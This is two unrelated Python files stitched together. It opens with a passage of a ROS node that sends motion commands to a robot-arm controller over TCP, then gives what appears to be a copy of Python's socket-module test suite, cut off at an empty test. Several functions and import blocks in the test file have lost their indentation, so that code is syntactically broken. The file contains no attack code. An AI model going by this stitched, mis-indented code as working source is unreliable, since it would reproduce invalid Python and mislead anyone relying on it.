        elif self.value in args:  # changed for v1.5, see below
            self.fall = True
            return True
        else:
            return False
##----------- arm state reported back to the client -----------
class StateFeedback():
    """Latest arm state and sent-confirmation flag parsed from controller replies."""

    def __init__(self, ArmState, SentFlag):
        self.ArmState, self.SentFlag = ArmState, SentFlag
# Shared instance published by socket_talker and updated by Socket_feedback.
state_feedback = StateFeedback(0,0)
class client():
    """Minimal TCP client wrapper around the arm-controller connection."""

    def __init__(self):
        #self.get_connect()
        pass

    def get_connect(self):
        """Open a TCP connection to the arm controller."""
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.s.connect(('192.168.0.1', 8080))

    def send(self, msg):
        """UTF-8 encode ``msg`` (a str) and send it on the socket."""
        self.s.send(msg.encode('utf-8'))

    def get_recieve(self):
        """Receive up to 1024 bytes and return them as raw ``bytes``.

        Deliberately returns bytes: Socket_feedback indexes into the buffer
        and compares integer byte values. The original contained a no-op
        ``data.decode('utf-8')`` whose result was discarded -- it only served
        to raise UnicodeDecodeError on non-UTF-8 replies, so it is removed.
        (Method name typo kept: callers use ``get_recieve``.)
        """
        data = self.s.recv(1024)  # 1024 = receive buffer size limit
        return data

    def close(self):
        """Close the underlying socket."""
        self.s.close()
#Socket = client()
def point_data(x, y, z, pitch, roll, yaw):
    """Store a target pose received from the strategy side into the global ``pos``."""
    pos.x, pos.y, pos.z = x, y, z
    pos.pitch, pos.roll, pos.yaw = pitch, roll, yaw
##---------- arm mode command from the strategy side ----------###
def Arm_Mode(action, grip, ra, setvel, setboth):
    """Record an arm-motion command into the global ``socket_cmd`` and raise
    the flag that tells Socket_feedback a command is pending."""
    global arm_mode_flag
    cmd = socket_cmd
    cmd.action = action
    cmd.grip = grip
    cmd.ra = ra
    cmd.setvel = setvel
    cmd.setboth = setboth
    # Signal the polling loop in Socket_feedback.
    arm_mode_flag = True
#Socket_command()
##------- arm speed mode from the strategy side -------###
def Speed_Mode(speedmode):
    """Record the requested speed mode (fast vs. safe) on the global command."""
    socket_cmd.Speedmode = speedmode
def socket_talker(): ## create the ROS server node
    """ROS node loop: publish [ArmState, SentFlag] on 'chatter' at 10 Hz
    until rospy shuts down."""
    pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
    rospy.init_node(NAME)
    rate = rospy.Rate(10) # 10hz
    print ("Ready to connect")
    while not rospy.is_shutdown():
        # hello_str = "hello world %s" % rospy.get_time()
        state = Int32MultiArray()
        state.data = [state_feedback.ArmState,state_feedback.SentFlag]
        pub.publish(state)
        rate.sleep()
##---------- socket packet transmission --------------##
##--------------- send arm commands over the socket -----------------
def Socket_command(s):
    """Serialize the pending global command (``socket_cmd`` + ``pos``) into a
    controller command string and send it on client wrapper ``s``.

    Dispatches on socket_cmd.action (PtoP / Line / SetVel / Delay / Mode),
    then resets action to 6 (idle) so the command is sent only once.
    """
    global arm_mode_flag,data
    # if arm_mode_flag == True:
    # arm_mode_flag = False
    for case in switch(socket_cmd.action):
        #-------PtP Mode--------
        if case(Taskcmd.Action_Type.PtoP):
            # Inner switch selects position / Euler / both control modes.
            for case in switch(socket_cmd.setboth):
                if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                    data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                    data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                    data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                    break
            break
        #-------Line Mode--------
        if case(Taskcmd.Action_Type.Line):
            for case in switch(socket_cmd.setboth):
                if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                    data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                    data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                    data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                    break
            break
        #------- set arm velocity --------
        if case(Taskcmd.Action_Type.SetVel):
            data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
            break
        #------- set arm delay time --------
        if case(Taskcmd.Action_Type.Delay):
            data = TCP.SetDelay(socket_cmd.grip,0)
            break
        #------- set arm fast/safe speed mode --------
        if case(Taskcmd.Action_Type.Mode):
            data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
            break
    socket_cmd.action= 6 ## reset to the idle action state
    print(data)
    print("Socket:", s)
    #Socket.send(data.encode('utf-8'))# socket send (encode str for transmission)
    s.send(data)
##----------- socket client --------
def socket_client():
    """Connect to the arm controller and run the feedback loop.

    Exits the process (sys.exit(1)) when the connection cannot be opened;
    otherwise blocks in Socket_feedback until the strategy completes, then
    installs the rospy shutdown hook and closes the socket.
    """
    #global Socket
    try:
        Socket = client()
        Socket.get_connect()
        #Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        #Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
        #s.connect(('192.168.1.102', 8080))#iclab computerx
        print('Connection has been successful')
    except socket.error as msg:
        print(msg)
        sys.exit(1)
    #print('Connection has been successful')
    print(Socket.get_recieve())
    Socket_feedback(Socket)
    # while 1:
    #     feedback_str = Socket.recv(1024)
    #     # controller reports the arm state
    #     if str(feedback_str[2]) == '48':# F: arm Ready for the next motion command
    #         state_feedback.ArmState = 0
    #     if str(feedback_str[2]) == '49':# T: arm busy, cannot take a command
    #         state_feedback.ArmState = 1
    #     if str(feedback_str[2]) == '54':# 6: strategy complete
    #         state_feedback.ArmState = 6
    #         print("shutdown")
    #     # sent-confirmation flag
    #     if str(feedback_str[4]) == '48':# returns 0, false
    #         state_feedback.SentFlag = 0
    #     if str(feedback_str[4]) == '49':# returns 1, true
    #         state_feedback.SentFlag = 1
    #     ##--------------- arm command transmission end -----------------
    #     if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
    #         break
    rospy.on_shutdown(myhook)
    Socket.close()
def Socket_feedback(s):
    """Main command/feedback loop over client wrapper ``s``.

    Sends the pending command whenever arm_mode_flag is raised, then parses
    each raw reply: byte index 2 carries the arm state, byte index 4 the
    sent-confirmation flag. Loops until the controller reports the
    strategy-complete state.
    """
    global arm_mode_flag
    Socket = s
    while 1:
        if arm_mode_flag == True:
            arm_mode_flag = False
            print (11111)
            Socket_command(Socket)
        feedback_str = Socket.get_recieve()
        # Controller reports the arm state in byte index 2 of the reply.
        if str(feedback_str[2]) == '48':# 'F': arm Ready for the next motion command
            state_feedback.ArmState = 0
        if str(feedback_str[2]) == '49':# 'T': arm busy, cannot take a command
            state_feedback.ArmState = 1
        if str(feedback_str[2]) == '54':# '6': strategy complete
            state_feedback.ArmState = 6
            print("shutdown")
        # Sent-confirmation flag lives in byte index 4.
        if str(feedback_str[4]) == '48':# returns 0, false
            state_feedback.SentFlag = 0
        if str(feedback_str[4]) == '49':# returns 1, true
            state_feedback.SentFlag = 1
        ##--------------- arm command transmission end -----------------
        if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
            break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
    """rospy shutdown hook: announce that the node is going down."""
    print("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 6 ## start in the idle action state
    ## threading: run the socket client alongside the ROS publisher
    t = threading.Thread(target=socket_client)
    t.start() # start the socket-client thread
    #time.sleep(1)
    try:
        socket_talker()
    except rospy.ROSInterruptException:
        pass
    t.join()
    ## threading end
|
test_socket.py | import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8') ## test unicode string and carriage return
VSOCKPORT = 1234
try:
import _socket
except ImportError:
_socket = None
def get_cid():
    # Return the local AF_VSOCK context id as an int, or None when it cannot
    # be determined (no fcntl module, or /dev/vsock missing/inaccessible).
    if fcntl is None:
        return None
    try:
        # The ioctl writes a 32-bit CID into the 4-byte buffer argument.
        with open("/dev/vsock", "rb") as f:
            r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, "    ")
    except OSError:
        return None
    else:
        return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
    """Check whether AF_VSOCK sockets are supported on this host."""
    # A usable vsock requires a resolvable local CID.
    return get_cid() is not None
def _is_fd_in_blocking_mode(sock):
return not bool(
fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
# Capability probes evaluated once at import time and used by skip decorators.
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
    """Fixture providing a listening TCP server socket on an ephemeral port."""
    def setUp(self):
        self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # bind_port picks an unused port and returns it.
        self.port = support.bind_port(self.serv)
        self.serv.listen()
    def tearDown(self):
        self.serv.close()
        self.serv = None
class SocketUDPTest(unittest.TestCase):
    """Fixture providing a bound UDP server socket on an ephemeral port."""
    def setUp(self):
        self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.port = support.bind_port(self.serv)
    def tearDown(self):
        self.serv.close()
        self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
    """Subclass of unittest.TestCase with thread-safe cleanup methods.
    This subclass protects the addCleanup() and doCleanups() methods
    with a recursive lock.
    """
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # RLock (not Lock): doCleanups may trigger nested addCleanup calls
        # on the same thread.
        self._cleanup_lock = threading.RLock()
    def addCleanup(self, *args, **kwargs):
        with self._cleanup_lock:
            return super().addCleanup(*args, **kwargs)
    def doCleanups(self, *args, **kwargs):
        with self._cleanup_lock:
            return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
    """To be able to run this test, a `vcan0` CAN interface can be created with
    the following commands:
    # modprobe vcan
    # ip link add dev vcan0 type vcan
    # ifconfig vcan0 up
    """
    interface = 'vcan0'
    bufsize = 128
    """The CAN frame structure is defined in <linux/can.h>:
    struct can_frame {
    canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
    __u8 can_dlc; /* data length code: 0 .. 8 */
    __u8 data[8] __attribute__((aligned(8)));
    };
    """
    can_frame_fmt = "=IB3x8s"
    can_frame_size = struct.calcsize(can_frame_fmt)
    """The Broadcast Management Command frame structure is defined
    in <linux/can/bcm.h>:
    struct bcm_msg_head {
    __u32 opcode;
    __u32 flags;
    __u32 count;
    struct timeval ival1, ival2;
    canid_t can_id;
    __u32 nframes;
    struct can_frame frames[0];
    }
    `bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
    `struct can_frame` definition). Must use native not standard types for packing.
    """
    bcm_cmd_msg_fmt = "@3I4l2I"
    # Pad the struct out to an 8-byte boundary as required above.
    bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
    def setUp(self):
        # Skip (rather than fail) when the vcan0 interface is not configured.
        self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
        self.addCleanup(self.s.close)
        try:
            self.s.bind((self.interface,))
        except OSError:
            self.skipTest('network interface `%s` does not exist' %
                          self.interface)
class SocketRDSTest(unittest.TestCase):
    """To be able to run this test, the `rds` kernel module must be loaded:
    # modprobe rds
    """
    bufsize = 8192
    def setUp(self):
        # Skip (rather than fail) when RDS sockets cannot be bound.
        self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
        self.addCleanup(self.serv.close)
        try:
            self.port = support.bind_port(self.serv)
        except OSError:
            self.skipTest('unable to bind RDS socket')
class ThreadableTest:
    """Threadable Test class
    The ThreadableTest class makes it easy to create a threaded
    client/server pair from an existing unit test. To create a
    new threaded class from an existing unit test, use multiple
    inheritance:
    class NewClass (OldClass, ThreadableTest):
    pass
    This class defines two new fixture functions with obvious
    purposes for overriding:
    clientSetUp ()
    clientTearDown ()
    Any new test functions within the class must then define
    tests in pairs, where the test name is preceded with a
    '_' to indicate the client portion of the test. Ex:
    def testFoo(self):
    # Server portion
    def _testFoo(self):
    # Client portion
    Any exceptions raised by the clients during their tests
    are caught and transferred to the main thread to alert
    the testing framework.
    Note, the server setup function cannot call any blocking
    functions that rely on the client thread during setup,
    unless serverExplicitReady() is called just before
    the blocking call (such as in setting up a client/server
    connection and performing the accept() in setUp().
    """
    def __init__(self):
        # Swap the true setup function
        self.__setUp = self.setUp
        self.__tearDown = self.tearDown
        self.setUp = self._setUp
        self.tearDown = self._tearDown
    def serverExplicitReady(self):
        """This method allows the server to explicitly indicate that
        it wants the client thread to proceed. This is useful if the
        server is about to execute a blocking routine that is
        dependent upon the client thread during its setup routine."""
        self.server_ready.set()
    def _setUp(self):
        # Wrapper around the real setUp: start the client thread, then run
        # the server-side setUp; always release the client afterwards.
        self.wait_threads = support.wait_threads_exit()
        self.wait_threads.__enter__()
        self.server_ready = threading.Event()
        self.client_ready = threading.Event()
        self.done = threading.Event()
        # Holds at most one exception transferred from the client thread.
        self.queue = queue.Queue(1)
        self.server_crashed = False
        # Do some munging to start the client test.
        methodname = self.id()
        i = methodname.rfind('.')
        methodname = methodname[i+1:]
        test_method = getattr(self, '_' + methodname)
        self.client_thread = thread.start_new_thread(
            self.clientRun, (test_method,))
        try:
            self.__setUp()
        except:
            self.server_crashed = True
            raise
        finally:
            self.server_ready.set()
        self.client_ready.wait()
    def _tearDown(self):
        # Wrapper around the real tearDown: wait for the client to finish,
        # then re-raise any exception it queued.
        self.__tearDown()
        self.done.wait()
        self.wait_threads.__exit__(None, None, None)
        if self.queue.qsize():
            exc = self.queue.get()
            raise exc
    def clientRun(self, test_func):
        # Client-thread body: run clientSetUp then the _test* method,
        # shipping any exception back to the server thread via the queue.
        self.server_ready.wait()
        try:
            self.clientSetUp()
        except BaseException as e:
            self.queue.put(e)
            self.clientTearDown()
            return
        finally:
            self.client_ready.set()
        if self.server_crashed:
            self.clientTearDown()
            return
        if not hasattr(test_func, '__call__'):
            raise TypeError("test_func must be a callable function")
        try:
            test_func()
        except BaseException as e:
            self.queue.put(e)
        finally:
            self.clientTearDown()
    def clientSetUp(self):
        raise NotImplementedError("clientSetUp must be implemented.")
    def clientTearDown(self):
        self.done.set()
        thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
    """TCP server fixture plus a client socket running in its own thread."""
    def __init__(self, methodName='runTest'):
        SocketTCPTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)
    def clientSetUp(self):
        self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
    """UDP server fixture plus a client socket running in its own thread."""
    def __init__(self, methodName='runTest'):
        SocketUDPTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)
    def clientSetUp(self):
        self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
    """CAN server fixture plus a client CAN socket in its own thread."""
    def __init__(self, methodName='runTest'):
        SocketCANTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)
    def clientSetUp(self):
        self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
        try:
            self.cli.bind((self.interface,))
        except OSError:
            # skipTest should not be called here, and will be called in the
            # server instead
            pass
    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
    """RDS server fixture plus a bound client RDS socket in its own thread."""
    def __init__(self, methodName='runTest'):
        SocketRDSTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)
    def clientSetUp(self):
        self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
        try:
            # RDS sockets must be bound explicitly to send or receive data
            self.cli.bind((HOST, 0))
            self.cli_addr = self.cli.getsockname()
        except OSError:
            # skipTest should not be called here, and will be called in the
            # server instead
            pass
    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
                     'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
                     "This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
    """Client/server AF_VSOCK stream test; runs only inside a virtual guest."""
    def __init__(self, methodName='runTest'):
        unittest.TestCase.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)
    def setUp(self):
        self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
        self.addCleanup(self.serv.close)
        self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
        self.serv.listen()
        # Release the client thread before the blocking accept().
        self.serverExplicitReady()
        self.conn, self.connaddr = self.serv.accept()
        self.addCleanup(self.conn.close)
    def clientSetUp(self):
        time.sleep(0.1)
        self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
        self.addCleanup(self.cli.close)
        cid = get_cid()
        self.cli.connect((cid, VSOCKPORT))
    def testStream(self):
        msg = self.conn.recv(1024)
        self.assertEqual(msg, MSG)
    def _testStream(self):
        self.cli.send(MSG)
        self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
    """Socket tests for client-server connection.
    self.cli_conn is a client socket connected to the server. The
    setUp() method guarantees that it is connected to the server.
    """
    def __init__(self, methodName='runTest'):
        ThreadedTCPSocketTest.__init__(self, methodName=methodName)
    def setUp(self):
        ThreadedTCPSocketTest.setUp(self)
        # Indicate explicitly we're ready for the client thread to
        # proceed and then perform the blocking call to accept
        self.serverExplicitReady()
        conn, addr = self.serv.accept()
        self.cli_conn = conn
    def tearDown(self):
        self.cli_conn.close()
        self.cli_conn = None
        ThreadedTCPSocketTest.tearDown(self)
    def clientSetUp(self):
        ThreadedTCPSocketTest.clientSetUp(self)
        self.cli.connect((HOST, self.port))
        self.serv_conn = self.cli
    def clientTearDown(self):
        self.serv_conn.close()
        self.serv_conn = None
        ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
    """Fixture built on socketpair(): self.serv and self.cli are pre-connected."""
    def __init__(self, methodName='runTest'):
        unittest.TestCase.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)
    def setUp(self):
        self.serv, self.cli = socket.socketpair()
    def tearDown(self):
        self.serv.close()
        self.serv = None
    def clientSetUp(self):
        # Nothing to do: the pair is already connected.
        pass
    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
    """A base class for socket tests.
    Subclasses must provide methods newSocket() to return a new socket
    and bindSock(sock) to bind it to an unused address.
    Creates a socket self.serv and sets self.serv_addr to its address.
    """
    def setUp(self):
        self.serv = self.newSocket()
        self.bindServer()
    def bindServer(self):
        """Bind server socket and set self.serv_addr to its address."""
        self.bindSock(self.serv)
        self.serv_addr = self.serv.getsockname()
    def tearDown(self):
        self.serv.close()
        self.serv = None
class SocketListeningTestMixin(SocketTestBase):
    """Mixin to listen on the server socket."""
    def setUp(self):
        super().setUp()
        # Default backlog is fine for these tests.
        self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
                              ThreadableTest):
    """Mixin to add client socket and allow client/server tests.
    Client socket is self.cli and its address is self.cli_addr. See
    ThreadableTest for usage information.
    """
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        ThreadableTest.__init__(self)
    def clientSetUp(self):
        self.cli = self.newClientSocket()
        self.bindClient()
    def newClientSocket(self):
        """Return a new socket for use as client."""
        return self.newSocket()
    def bindClient(self):
        """Bind client socket and set self.cli_addr to its address."""
        self.bindSock(self.cli)
        self.cli_addr = self.cli.getsockname()
    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
                               ThreadedSocketTestMixin):
    """Mixin to allow client/server stream tests with connected client.
    Server's socket representing connection to client is self.cli_conn
    and client's connection to server is self.serv_conn. (Based on
    SocketConnectedTest.)
    """
    def setUp(self):
        super().setUp()
        # Indicate explicitly we're ready for the client thread to
        # proceed and then perform the blocking call to accept
        self.serverExplicitReady()
        conn, addr = self.serv.accept()
        self.cli_conn = conn
    def tearDown(self):
        self.cli_conn.close()
        self.cli_conn = None
        super().tearDown()
    def clientSetUp(self):
        super().clientSetUp()
        self.cli.connect(self.serv_addr)
        self.serv_conn = self.cli
    def clientTearDown(self):
        try:
            # serv_conn may never have been set if clientSetUp failed early.
            self.serv_conn.close()
            self.serv_conn = None
        except AttributeError:
            pass
        super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
    """Base class for Unix-domain socket tests."""
    # This class is used for file descriptor passing tests, so we
    # create the sockets in a private directory so that other users
    # can't send anything that might be problematic for a privileged
    # user running the tests.
    def setUp(self):
        self.dir_path = tempfile.mkdtemp()
        self.addCleanup(os.rmdir, self.dir_path)
        super().setUp()
    def bindSock(self, sock):
        # mktemp's name race is acceptable: the directory is private.
        path = tempfile.mktemp(dir=self.dir_path)
        support.bind_unix_socket(sock, path)
        self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
    """Base class for Unix-domain SOCK_STREAM tests."""

    def newSocket(self):
        # Stream socket in the Unix address family.
        return socket.socket(family=socket.AF_UNIX,
                             type=socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
    """Base class for IPv4 socket tests."""

    host = HOST

    def setUp(self):
        super().setUp()
        # Remember which port the server socket ended up bound to.
        self.port = self.serv_addr[1]

    def bindSock(self, sock):
        # Bind to an ephemeral port on the configured host.
        support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
    """Base class for TCP-over-IPv4 tests."""

    def newSocket(self):
        # IPv4 stream socket (TCP).
        return socket.socket(family=socket.AF_INET,
                             type=socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
    """Base class for UDP-over-IPv4 tests."""

    def newSocket(self):
        # IPv4 datagram socket (UDP).
        return socket.socket(family=socket.AF_INET,
                             type=socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
    """Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""

    def newSocket(self):
        # SCTP in one-to-one mode uses a stream socket with the SCTP proto.
        return socket.socket(family=socket.AF_INET,
                             type=socket.SOCK_STREAM,
                             proto=socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
    """Base class for IPv6 socket tests."""

    # Override the IPv4 HOST with the loopback host for IPv6.
    host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
    """Base class for UDP-over-IPv6 tests."""

    def newSocket(self):
        # IPv6 datagram socket (UDP).
        return socket.socket(family=socket.AF_INET6,
                             type=socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
    """Skip decorated test if condition is true, add client_skip decorator.

    If the decorated object is not a class, sets its attribute
    "client_skip" to a decorator which will return an empty function
    if the test is to be skipped, or the original function if it is
    not. This can be used to avoid running the client part of a
    skipped test when using ThreadableTest.
    """
    def client_pass(*args, **kwargs):
        pass

    def decorate_skipped(obj):
        # Skip the test itself and neutralize the client half too.
        wrapped = unittest.skip(reason)(obj)
        if not isinstance(obj, type):
            wrapped.client_skip = lambda f: client_pass
        return wrapped

    def decorate_active(obj):
        # Not skipped: client_skip is the identity unless already set.
        if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
            obj.client_skip = lambda f: f
        return obj

    if condition:
        return decorate_skipped
    return decorate_active
def requireAttrs(obj, *attributes):
    """Skip decorated test if obj is missing any of the given attributes.

    Sets client_skip attribute as skipWithClientIf() does.
    """
    missing = [name for name in attributes if not hasattr(obj, name)]
    # str.join() takes the list directly; the generator wrapper was redundant.
    return skipWithClientIf(missing, "don't have " + ", ".join(missing))
def requireSocket(*args):
    """Skip decorated test if a socket cannot be created with given arguments.

    When an argument is given as a string, will use the value of that
    attribute of the socket module, or skip the test if it doesn't
    exist. Sets client_skip attribute as skipWithClientIf() does.
    """
    err = None
    # String arguments name socket-module constants; they must exist.
    missing = [obj for obj in args if
               isinstance(obj, str) and not hasattr(socket, obj)]
    if missing:
        # str.join() takes the list directly; no generator needed.
        err = "don't have " + ", ".join(missing)
    else:
        callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
                    for obj in args]
        try:
            s = socket.socket(*callargs)
        except OSError as e:
            # XXX: check errno?
            err = str(e)
        else:
            s.close()
    return skipWithClientIf(
        err is not None,
        "can't create socket({0}): {1}".format(
            ", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
    def test_repr(self):
        """repr() of a socket shows fd/family/type/proto plus bound addresses."""
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        with s:
            self.assertIn('fd=%i' % s.fileno(), repr(s))
            self.assertIn('family=%s' % socket.AF_INET, repr(s))
            self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
            self.assertIn('proto=0', repr(s))
            # No remote address before any connection is made.
            self.assertNotIn('raddr', repr(s))
            s.bind(('127.0.0.1', 0))
            # Local address appears once the socket is bound.
            self.assertIn('laddr', repr(s))
            self.assertIn(str(s.getsockname()), repr(s))
        # After the with-block the socket is closed; repr reflects that.
        self.assertIn('[closed]', repr(s))
        self.assertNotIn('laddr', repr(s))
    @unittest.skipUnless(_socket is not None, 'need _socket module')
    def test_csocket_repr(self):
        """repr() of the low-level _socket.socket, both open and closed."""
        s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
        try:
            expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
                        % (s.fileno(), s.family, s.type, s.proto))
            self.assertEqual(repr(s), expected)
        finally:
            s.close()
        # A closed C socket reports fd=-1.
        expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
                    % (s.family, s.type, s.proto))
        self.assertEqual(repr(s), expected)
    def test_weakref(self):
        """Sockets support weak references; the proxy dies with the socket."""
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        p = proxy(s)
        self.assertEqual(p.fileno(), s.fileno())
        s.close()
        s = None
        try:
            # Accessing a dead weakref proxy must raise ReferenceError.
            p.fileno()
        except ReferenceError:
            pass
        else:
            self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
    def testSendtoErrors(self):
